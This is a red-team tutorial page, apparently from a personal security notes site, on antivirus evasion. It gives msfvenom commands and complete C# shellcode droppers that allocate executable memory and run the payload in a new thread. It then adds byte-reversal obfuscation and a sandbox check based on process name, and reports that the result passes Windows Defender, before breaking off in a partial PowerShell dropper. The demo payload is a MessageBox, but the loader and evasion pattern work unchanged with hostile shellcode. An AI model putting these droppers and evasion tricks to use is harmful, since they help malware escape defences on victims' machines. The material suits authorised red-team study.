ctfnote
  • /home/ret2basic.eth
  • Game Hacking
    • โœ…C++
    • Ghidra
    • Cheat Engine
    • Proxy
    • DLL injection
    • Keygen
    • Aimbot
  • Web3 Security Research
    • ๐Ÿ‘‘Web3 Security Research Trivia
    • โœ…Solidity
      • โœ…Mastering Ethereum
      • โœ…Storage
      • โœ…Memory
      • โœ…Calldata
      • โœ…ABI
    • โœ…Foundry
      • โœ…Introduction
      • โœ…How to Write Basic Tests
      • โœ…Set Soliditiy Compiler Version
      • โœ…Remappings
      • โœ…Auto Format Code
      • โœ…Console Log
      • โœ…Authentication
      • โœ…Error
      • โœ…Event
      • โœ…Time
      • โœ…Send ETH
      • โœ…Signature
      • โœ…Fork
      • โœ…Mint 1 Million DAI on Mainnet Fork
      • โœ…FFI
      • โœ…Fuzz
      • โœ…Invariant Testing - Part 1
      • Invariant Testing - Part 2
      • Invariant Testing - Part 3
      • Differential Test
    • โœ…Secureum
      • โœ…Epoch 0
        • โœ…Slot 1: Ethereum 101
          • โœ…Notes
          • โœ…Ethereum Whitepaper
          • โœ…Extra Study: What happens when you send 1 DAI
          • โœ…Quiz
        • โœ…Slot 2: Solidity 101
          • โœ…Notes
          • โœ…OpenZeppelin ERC20
          • โœ…OpenZeppelin ERC721
          • โœ…OpenZeppelin Ownable
          • โœ…OpenZeppelin Pausable
          • โœ…OpenZeppelin ReentrancyGuard
          • โœ…Quiz
        • โœ…Slot 3: Solidity 201
          • โœ…Notes
          • โœ…OpenZeppelin SafeERC20
          • โœ…OpenZeppelin ERC-777
          • โœ…OpenZeppelin ERC-1155
          • โœ…OpenZeppelin ERC-3156
          • โœ…OpenZeppelin - Proxy Upgrade Pattern
          • โœ…Quiz
        • โœ…Slot 4: Pitfalls and Best Practices 101
          • โœ…Notes
          • โœ…Intro to Security First Development
          • โœ…Quiz
        • โœ…Slot 5: Pitfalls and Best Practices 201
          • โœ…Notes
          • So you want to use a price oracle
          • The Dangers of Surprising Code
          • โœ…Quiz
        • โœ…Slot 6: Auditing Techniques & Tools 101
          • โœ…Notes
          • โœ…Quiz
        • โœ…Slot 7: Audit Findings 101
          • Notes
          • โœ…Fei Protocol - ConsenSys
          • โœ…Uniswap V3 - Trail of Bits
          • โœ…Chainlink - Sigma Prime
          • โœ…Opyn Gamma - OpenZeppelin
          • โœ…Quiz
        • โœ…Slot 8: Audit Findings 201
          • Notes
          • 1inch Liquidity - Consensus
          • Original Dollar - Trail of Bits
          • Synthetix EtherCollateral - Sigma Prime
          • Holdefi - OpenZeppelin
          • Quiz
      • โœ…Epoch โˆž
        • โœ…RACE #4 - ERC20 Implementation
        • โœ…RACE #5 - ERC1155 Implementation
        • โœ…RACE #6 - ERC721 Application
        • โœ…RACE #7 - Bored Ape
        • โœ…RACE #8 - ERC721 Roles
        • โœ…RACE #9 - Proxy
        • โœ…RACE #10 - Test Cases
        • โœ…RACE #11 - Staking
        • โœ…RACE #12 - ERC20 Permit
        • โœ…RACE #13 - ERC20 with Callback
        • โœ…RACE #14 - Lending
        • โœ…RACE #15 - DEX
        • โœ…RACE #16 - Flash Loan
        • โœ…RACE #17
    • DeFi
      • Glossary
        • TWAP vs. VWAP
        • Tranches
      • DeFi MOOC
        • Lecture 2: Introduction to Blockchain Technologies
        • Lecture 5: DEX
        • Lecture 6: Decentralized Lending
        • Lecture 10: Privacy on the Blockchain
        • Lecture 12: Practical Smart Contract Security
        • Lecture 13: DeFi Security
      • Uniswap V2
      • Compound V3
        • โœ…Whitepaper
        • โœ…Interacting with Compound
          • โœ…Supply and Redeem
          • โœ…Borrow and Repay
          • โœ…Liquidation
          • โœ…Long and Short
        • โœ…Interest Model
        • CToken
      • Aave
      • Chainlink
        • โœ…Getting Started
        • โœ…Data Feeds
        • โœ…VRF
      • Optimism
        • Bedrock
      • LayerZero
      • Opensea
        • Seaport
    • EVM
      • โœ…Andreas Antonopoulos - The Ethereum Virtual Machine
      • โœ…Program The Blockchain - Smart Contract Storage
      • โœ…EVM Codes - EVM Playground for Opcodes
      • โœ…Fvictorio - EVM Puzzles
      • โœ…Daltyboy11 - More EVM Puzzles
      • โœ…EVM Through Huff
      • Noxx - EVM Deep Dives
      • โœ…Jordan McKinney - EVM Explained
      • Openzepplin - Deconstructing a Solidity Contract
      • Jeancvllr - EVM Assembly
      • Peter Robinson - Solidity to Bytecode, Memory & Storage
      • Marek Kirejczyk - Ethereum Under The Hood
      • โœ…Official Solidity Docs
      • Dissecting EVM using go-ethereum Eth client implementation - deliriusz.eth
    • Vulnerabilities
      • Rounding Issues
        • Kyberswap
      • Bridges
      • Governance / Voting Escrows
      • Bizzare Bug Classes
        • TIME - ERC2771Context + Multicall calldata manipulation
    • Fancy Topics
      • Vulnerabilities SoK
        • โœ…Demystifying Exploitable Bugs in Smart Contracts
        • Blockchain Hacking Techniques 2022 Top 10 - Todo
      • yAcademy
        • Proxies
          • yAcademy - Proxy Basics
          • yAcademy - Proxies Deep Dive
          • yAcademy - Security Guide to Proxy Vulns
        • defi-fork-bugs
      • Spearbit
        • โœ…Community Workshop: Riley Holterhus
        • Economic Security with fmrmf
        • Numerical Analysis for DeFi Audits: A TWAMM Case Study by Kurt Barry
  • Red Teaming
    • โœ…Enumeration
      • Service Enumeration
        • SMTP (Port 25)
        • Samba (Port 139, 445)
        • SNMP (Port 161,162,10161,10162)
        • rsync (Port 873)
        • NFS (Port 2049)
        • Apache JServ Protocol (Port 8081)
        • NetBIOS
      • Nmap
      • Gobuster / Feroxbuster / FUFF / Wfuzz
      • Drupal
    • โœ…Exploitation
      • Public Exploits
      • PHP Webshells
      • Reverse Shell
      • TTY
      • File Transfer
      • Metasploit
      • Password Spray
    • โœ…Buffer Overflow
      • Step 0: Spiking (Optional)
      • Step 1: Fuzzing
      • Step 2: Finding the Offset
      • Step 3: Overwriting the EIP
      • Step 4: Finding Bad Characters
      • Step 5: Finding the Right Module
      • Step 6: Generating Shellcode and Gaining Root
    • โœ…Privilege Escalation
      • Linux Privilege Escalation
        • Linux Permissions
        • Manual Enumeration
        • Automated Tools
        • Kernel Exploits
        • Passwords and File Permissions
        • SSH Keys
        • Sudo
        • SUID
        • Capabilities
        • Cron Jobs
        • NFS Root Squashing
        • Docker
        • GNU C Library
        • Exim
        • Linux Privilege Escalation Course Capstone
      • Windows Privilege Escalation
        • Manual Enumeration
        • Automated Tools
        • Kernel Exploits
        • Passwords and Port Forwarding
        • WSL
        • Token Impersonation and Potato Attacks
        • Meterpreter getsystem
        • Runas
        • UAC Bypass
        • Registry
        • Executable Files
        • Startup Applications
        • DLL Hijacking
        • Service Permissions (Paths)
        • CVE-2019-1388
        • HiveNightmare
        • Bypass Space Filter
    • โœ…Post Exploitation
      • Linux Post Exploitation
        • Add a User
        • SSH Key
      • Windows Post Exploitation
        • windows-resources
        • Add a User
        • RDP
    • โœ…Pivoting
      • Windows: Chisel
      • Linux: sshuttle
    • Active Directory (AD)
      • Initial Compromise
        • HTA Phishing
        • VBA Macro Phishing
        • LLMNR Poisoning
        • SMB Relay
        • GPP / cPassword
      • Domain Enumeration
        • Manual Enumeration
        • PowerView
        • BloodHound
      • Lateral Movement
        • PsExec
        • WMI
        • Runas
        • Pass the Hash
        • Overpass the Hash
        • Pass the Ticket
      • Kerberos
        • Kerberoast
        • AS-REP Roast
      • MS SQL Server
    • Command & Control (C2)
      • Cobalt Strike
        • Bypassing Defences
          • Artifact Kit
          • Resource Kit
          • AMSI Bypass
          • PowerPick
        • Extending Cobalt Strike
          • Elevate Kit
          • Malleable C2 Profile
      • Metasploit
        • Payloads
        • Post Exploitation
        • Automation
      • C2 Development
    • Malware Development
      • "Hot Dropper"
      • PE Format
        • Overview
      • Process Injection
      • Reflective DLL
      • x86 <=> x64
      • Hooking
      • VeraCry
      • Offensive C#
      • AV Evasion
        • AV Evasion with C# and PowerShell
        • AMSI Bypass
  • Cryptography
    • Hash Functions
    • MAC
    • AES
      • Byte at a Time
      • CBC CCA
      • CBC Bit Flipping
      • CBC Padding Oracle
    • Diffie-Hellman
    • RSA
      • Prime Factors
      • Multiple Ciphertexts
      • Low Public Exponent
      • Low Private Exponent
    • ECC
    • Digital Signature
    • JWT
    • PRNG
    • SSL/TLS
    • Research
      • โœ…Lattice-based Cryptography (Lattice)
      • Elliptic Curve Cryptography (ECC)
      • Oblivious Transfer (OT)
      • Secure Multi-party Computation (MPC)
      • Learning with Error (LWE)
      • Fully Homomorphic Encryption (FHE)
      • Zero Knowledge Proof (ZKP)
      • Oblivious RAM (ORAM)
  • Computer Science
    • Linux
      • Setup
      • curl
      • Hard Link vs. Symlink
      • Man Page
      • /dev/null
    • Python
      • New Features
      • Operators, Expressions, and Data Manipulation
      • Program Structure and Control Flow
      • Objects, Types, and Protocols
      • Functions 101
      • Generators
      • Classes and Object-Oriented Programming
      • Memory Management
      • Concurrency and Parallelism
        • Multithreading and Thread Safety
        • Asynchronization
        • Multiprocessing
        • Global Interpreter Lock (GIL)
      • Built-in Functions and Standard Library
        • import collections
        • import itertools
        • import sys
        • import re
        • import pickle
        • import json
      • Third-party Library
        • from pwn import *
        • import requests
        • from bs4 import BeautifulSoup
        • from scapy.all import *
        • py2exe
    • HTML, CSS, JavaScript, and React
      • HTML
      • CSS
      • JavaScript
        • var vs. let
        • Objects
        • Arrays
        • Functions
        • Modules
        • Asynchronous JavaScript
      • React
    • Data Structures and Algorithms
      • Binary Search
    • The Linux Programming Interface
      • Processes
        • Memory Allocation
        • The Process API
        • Process Creation
        • Process Termination
        • Monitoring Child Processes
        • Program Execution
      • Signals
      • Threads
        • Thread Synchronization
        • Thread Safety and Pre-Thread Storage
      • IPC
        • Pipes and FIFOs
        • Memory Mappings
        • Virtual Memory Operations
      • Sockets
    • Computer Systems
      • Hexadecimal
      • Signedness
      • Registers
      • Instructions
      • Syscall
      • Process Memory
      • Stack Frame
      • Preemptive Multitasking
      • IPC
      • Threads
    • Databases
      • MySQL
        • Basic Syntax
        • Data Types
        • Modifying Tables
        • Duplicating and Deleting
        • SELECT
        • Transaction
      • GraphQL
    • Distributed Systems
      • Introduction
        • What is a Distributed System?
        • Design Goals
        • Scaling Techniques
        • Types of Distributed Systems
      • Architecture
        • System Architectures
        • Example Architectures
      • Communication
        • Foundations
        • Remote Procedure Call
        • Message-oriented Communication
      • Coordination
        • Clock Synchronization
        • Logical Clock
      • Consistency and Replication
        • Introduction
        • Data-centric Consistency
        • Client-centric Consistency
    • Static Analysis
      • Intermediate Representation
      • Data Flow Analysis
      • Interprocedural Analysis
      • Pointer Analysis
      • Static Analysis for Security
      • Datalog-Based Program Analysis
      • Soundness and Soundiness
      • CFL-Reachability and IFDS
  • Web
    • โœ…Prerequisites
      • OWASP Top 10
        • 1. Broken Access Control
        • 2. Cryptographic Failures
        • 3. Injection
        • 4. Insecure Design
        • 5. Security Misconfiguration
        • 6. Vulnerable and Outdated Components
        • 7. Identification and Authentication Failures
        • 8. Software and Data Integrity Failures
        • 9. Security Logging and Monitoring Failures
        • 10. SSRF
      • HTTP
        • HTTP Status Codes
        • HTTP Headers
      • Burp Suite
        • Burp Intruder
        • Burp Extender
        • Burp Collaborator
      • Information Gathering
        • DNS
        • Git
        • Editor
        • Server
      • Bug Bounty Report Writing
    • File Upload
      • Webshell
      • IIS, Nginx, and Apache Vulnerabilities
      • .htaccess (Apache) / web.config (IIS)
      • Alternate Data Stream
      • Code Review: bWAPP Unrestricted File Upload
    • SQL Injection (SQLi)
      • Cheat Sheet
      • UNION Attacks
      • Examining the Database
      • Blind SQL Injection
      • WAF Bypass
      • Out-Of-Band (OOB)
      • Webshell and UDF
      • sqlmap
        • Code Review: Initialization
        • Code Review: tamper
    • Cross-Site Scripting (XSS)
      • Cheat Sheet
      • Reflected XSS
      • Stored XSS
      • DOM-Based XSS
      • XSS Contexts
      • CSP
    • CSRF and SSRF
      • Client-Side Request Forgery (CSRF)
        • XSS vs. CSRF
        • CSRF Tokens and SameSite Cookies
      • Server-Side Request Forgery (SSRF)
        • Attacks
        • Bypassing Restrictions
        • SSRF + Redis
    • XML External Entities (XXE)
    • Insecure Deserialization
      • Python Deserialization
      • PHP Deserialization
      • Java Deserialization
        • Shiro
        • FastJSON
        • WebLogic
    • HTTP Request Smuggling
    • OS Command Injection
      • Whitespace Bypass
      • Blacklist Bypass
      • Blind OS Command Injection
      • Lab 1: HITCON 2015 BabyFirst
      • Lab 2: HITCON 2017 BabyFirst Revenge
      • Lab 3: HITCON 2017 BabyFirst Revenge v2
    • โœ…Directory Traversal
    • HTTP Parameter Pollution
    • Server-Side Template Injection (SSTI)
    • LDAP Injection
    • Redis
      • Authentication
      • RCE
      • Mitigations
  • Pwn
    • Linux Exploitation
      • Protections
      • Shellcoding
        • Calling Convention
        • Null-free
        • Reverse Shell
        • ORW
      • ROP
        • Stack Alignment
        • ret2text
        • ret2syscall
        • ret2libc
        • ret2csu
        • BROP
        • SROP
        • Stack Pivot
      • ptmalloc
        • chunks
        • malloc() and free()
        • bins
        • tcache
      • UAF
      • Race Conditions
        • TOCTTOU
        • Dirty Cow
        • Meltdown
        • Spectre
      • Kernel
      • Appendix: Tools
        • socat
        • LibcSearcher-ng
        • OneGadget
    • Windows Exploitation
      • Classic
      • SEH
      • Egghunting
      • Unicode
      • Shellcoding
      • ROP
      • Appendix: Tools
        • ImmunityDbg
        • Mona.py
    • Fuzzing
      • AFL++
        • Quickstart
        • Instrumentation
        • ASAN
        • Code Coverage
        • Dictionary
        • Parallelization
        • Partial Instrumentation
        • QEMU Mode
        • afl-libprotobuf-mutator
      • WinAFL
      • Fuzzilli
  • Reverse
    • Bytecode
      • Python Bytecode
    • ๐Ÿ‘‘Z3 solver
    • angr
      • angr Template
Powered by GitBook
On this page
  • Setup
  • AV Evasion with CSharp
  • Msfvenom Payload
  • Dropper
  • "Double Reverse" Technique
  • Sandbox
  • AV Evasion with PowerShell
  • C# -> PowerShell
  • What is AMSI?
  • AMSI Bypass
  • AV Evasion with Fibers
  • What is Fiber?
  • Thread -> Fiber
  • Reference

Was this helpful?

  1. Red Teaming
  2. Malware Development
  3. AV Evasion

AV Evasion with C# and PowerShell

PreviousAV EvasionNextAMSI Bypass

Last updated 2 years ago

Was this helpful?

Setup

In Visual Studio, create an empty C# project and name it "AV_Evasion". Create a C# class and name it "Dropper.cs".

AV Evasion with CSharp

Msfvenom Payload

On Kali, generate a vanilla meterpreter reverse shell payload with msfvenom:

msfvenom -p windows/x64/messagebox -f exe -o msgbox64.exe

Upload msgbox64.exe to :

This payload does not pass Windows Defender check.

Dropper

On Kali, generate MessageBox payload in C# format:

msfvenom -p windows/x64/messagebox -f csharp

In Visual Studio, write a dropper in C#:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

		static void Main(string[] args)
		{
			// msfvenom -p windows/x64/messagebox -f csharp
			byte[] buf = new byte[295] {
			0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
			0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
			0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
			0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
			0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
			0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
			0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
			0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
			0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
			0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
			0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
			0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
			0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
			0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
			0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
			0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
			0x85,0x0f,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
			0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
			0x6c,0x6f,0x2c,0x20,0x66,0x72,0x6f,0x6d,0x20,0x4d,0x53,0x46,0x21,0x00,0x4d,
			0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x00 };

			int size = buf.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(buf, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

Build it and upload the executable to VirusTotal:

This payload does not pass Windows Defender check.

"Double Reverse" Technique

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

		static void Main(string[] args)
		{
			// msfvenom -p windows/x64/messagebox -f csharp
			byte[] waffle = new byte[295] {
			0x00, 0x78, 0x6f, 0x42, 0x65, 0x67, 0x61, 0x73, 0x73, 0x65, 0x4d, 0x00, 0x21, 0x46, 0x53, 0x4d, 0x20, 0x6d, 0x6f, 0x72, 0x66, 0x20, 0x2c, 0x6f, 0x6c, 0x6c, 0x65, 0x48, 0xd5, 0xff, 0x56, 0xa2, 0xb5, 0xf0, 0xba, 0x41, 0xc9, 0x31, 0x48, 0xd5, 0xff, 0x07, 0x56, 0x83, 0x45, 0xba, 0x41, 0xc9, 0x31, 0x48, 0x00, 0x00, 0x01, 0x0f, 0x85, 0x8d, 0x4c, 0x3e, 0x00, 0x00, 0x00, 0xfe, 0x95, 0x8d, 0x48, 0x3e, 0x00, 0x00, 0x00, 0x00, 0xc1, 0xc7, 0x49, 0x5d, 0xff, 0xff, 0xff, 0x49, 0xe9, 0x12, 0x8b, 0x48, 0x3e, 0x5a, 0x59, 0x41, 0x58, 0xe0, 0xff, 0x52, 0x41, 0x20, 0xec, 0x83, 0x48, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x41, 0x5a, 0x59, 0x5e, 0x58, 0x41, 0x58, 0x41, 0xd0, 0x01, 0x48, 0x88, 0x04, 0x8b, 0x41, 0x3e, 0xd0, 0x01, 0x49, 0x1c, 0x40, 0x8b, 0x44, 0x3e, 0x48, 0x0c, 0x8b, 0x41, 0x3e, 0x66, 0xd0, 0x01, 0x49, 0x24, 0x40, 0x8b, 0x44, 0x3e, 0x58, 0xd6, 0x75, 0xd1, 0x39, 0x45, 0x08, 0x24, 0x4c, 0x03, 0x4c, 0x3e, 0xf1, 0x75, 0xe0, 0x38, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0xd6, 0x01, 0x48, 0x88, 0x34, 0x8b, 0x41, 0x3e, 0xc9, 0xff, 0x48, 0x5c, 0xe3, 0xd0, 0x01, 0x49, 0x20, 0x40, 0x8b, 0x44, 0x3e, 0x18, 0x48, 0x8b, 0x3e, 0x50, 0xd0, 0x01, 0x48, 0x6f, 0x74, 0xc0, 0x85, 0x48, 0x00, 0x00, 0x00, 0x88, 0x80, 0x8b, 0x3e, 0xd0, 0x01, 0x48, 0x3c, 0x42, 0x8b, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x51, 0x41, 0x52, 0xed, 0xe2, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0x20, 0x2c, 0x02, 0x7c, 0x61, 0x3c, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0x4a, 0x4a, 0xb7, 0x0f, 0x48, 0x3e, 0x50, 0x72, 0x8b, 0x48, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x18, 0x52, 0x8b, 0x48, 0x3e, 0x60, 0x52, 0x8b, 0x48, 0x65, 0xd2, 0x31, 0x48, 0x56, 0x51, 0x52, 0x50, 0x41, 0x51, 0x41, 0x00, 0x00, 0x00, 0xd0, 0xe8, 0xff, 0xff, 0xff, 0xf0, 0xe4, 0x81, 0x48, 0xfc
			};

			Array.Reverse(waffle);

			int size = waffle.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(waffle, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

Build it and upload the executable to VirusTotal:

This payload does not pass Windows Defender check.

Sandbox

Before you run a suspicious executable, AV will spawn a tiny virtual machine (aka sandbox) to execute the executable and see if it is malicious.

Most sandboxes will dynamically rename the payload. To determine whether we are inside a sandbox or not, we can use System.Diagnostics.Process.GetCurrentProcess() to get process information during runtime. If the process name changes, then we are inside a sandbox. In such case, we should simply exit the program:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace AV_Evasion
{
	class Dropper
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint
			flAllocationType, uint flProtect);

		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize,
			IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

		static void Main(string[] args)
		{
			string proc = Process.GetCurrentProcess().ProcessName;

			if (proc != "AV_Evasion_3.exe")
			{
				Environment.Exit(0);
			}

			// msfvenom -p windows/x64/messagebox -f csharp
			byte[] waffle = new byte[295] {
			0x00, 0x78, 0x6f, 0x42, 0x65, 0x67, 0x61, 0x73, 0x73, 0x65, 0x4d, 0x00, 0x21, 0x46, 0x53, 0x4d, 0x20, 0x6d, 0x6f, 0x72, 0x66, 0x20, 0x2c, 0x6f, 0x6c, 0x6c, 0x65, 0x48, 0xd5, 0xff, 0x56, 0xa2, 0xb5, 0xf0, 0xba, 0x41, 0xc9, 0x31, 0x48, 0xd5, 0xff, 0x07, 0x56, 0x83, 0x45, 0xba, 0x41, 0xc9, 0x31, 0x48, 0x00, 0x00, 0x01, 0x0f, 0x85, 0x8d, 0x4c, 0x3e, 0x00, 0x00, 0x00, 0xfe, 0x95, 0x8d, 0x48, 0x3e, 0x00, 0x00, 0x00, 0x00, 0xc1, 0xc7, 0x49, 0x5d, 0xff, 0xff, 0xff, 0x49, 0xe9, 0x12, 0x8b, 0x48, 0x3e, 0x5a, 0x59, 0x41, 0x58, 0xe0, 0xff, 0x52, 0x41, 0x20, 0xec, 0x83, 0x48, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x41, 0x5a, 0x59, 0x5e, 0x58, 0x41, 0x58, 0x41, 0xd0, 0x01, 0x48, 0x88, 0x04, 0x8b, 0x41, 0x3e, 0xd0, 0x01, 0x49, 0x1c, 0x40, 0x8b, 0x44, 0x3e, 0x48, 0x0c, 0x8b, 0x41, 0x3e, 0x66, 0xd0, 0x01, 0x49, 0x24, 0x40, 0x8b, 0x44, 0x3e, 0x58, 0xd6, 0x75, 0xd1, 0x39, 0x45, 0x08, 0x24, 0x4c, 0x03, 0x4c, 0x3e, 0xf1, 0x75, 0xe0, 0x38, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0xd6, 0x01, 0x48, 0x88, 0x34, 0x8b, 0x41, 0x3e, 0xc9, 0xff, 0x48, 0x5c, 0xe3, 0xd0, 0x01, 0x49, 0x20, 0x40, 0x8b, 0x44, 0x3e, 0x18, 0x48, 0x8b, 0x3e, 0x50, 0xd0, 0x01, 0x48, 0x6f, 0x74, 0xc0, 0x85, 0x48, 0x00, 0x00, 0x00, 0x88, 0x80, 0x8b, 0x3e, 0xd0, 0x01, 0x48, 0x3c, 0x42, 0x8b, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x51, 0x41, 0x52, 0xed, 0xe2, 0xc1, 0x01, 0x41, 0x0d, 0xc9, 0xc1, 0x41, 0x20, 0x2c, 0x02, 0x7c, 0x61, 0x3c, 0xac, 0xc0, 0x31, 0x48, 0xc9, 0x31, 0x4d, 0x4a, 0x4a, 0xb7, 0x0f, 0x48, 0x3e, 0x50, 0x72, 0x8b, 0x48, 0x3e, 0x20, 0x52, 0x8b, 0x48, 0x3e, 0x18, 0x52, 0x8b, 0x48, 0x3e, 0x60, 0x52, 0x8b, 0x48, 0x65, 0xd2, 0x31, 0x48, 0x56, 0x51, 0x52, 0x50, 0x41, 0x51, 0x41, 0x00, 0x00, 0x00, 0xd0, 0xe8, 0xff, 0xff, 0xff, 0xf0, 0xe4, 0x81, 0x48, 0xfc
			};

			Array.Reverse(waffle);

			int size = waffle.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(waffle, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

Right click the solution "AV_Evasion", go to "Add Reference..." and add System. Build it and upload the executable to VirusTotal:

This payload passes Windows Defender check.

AV Evasion with PowerShell

C# -> PowerShell

Generate MessageBox shellcode in PowerShell format with msfvenom:

msfvenom -p windows/x64/messagebox -f ps1

Write a Dropper in PowerShell:

$Kernel32 = @"
using System;
using System.Runtime.InteropServices;
public class Kernel32 {

[DllImport("kernel32.dll")]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll", CharSet=CharSet.Ansi)]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("kernel32.dll", SetLastError=true)]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

}
"@
Add-Type $Kernel32

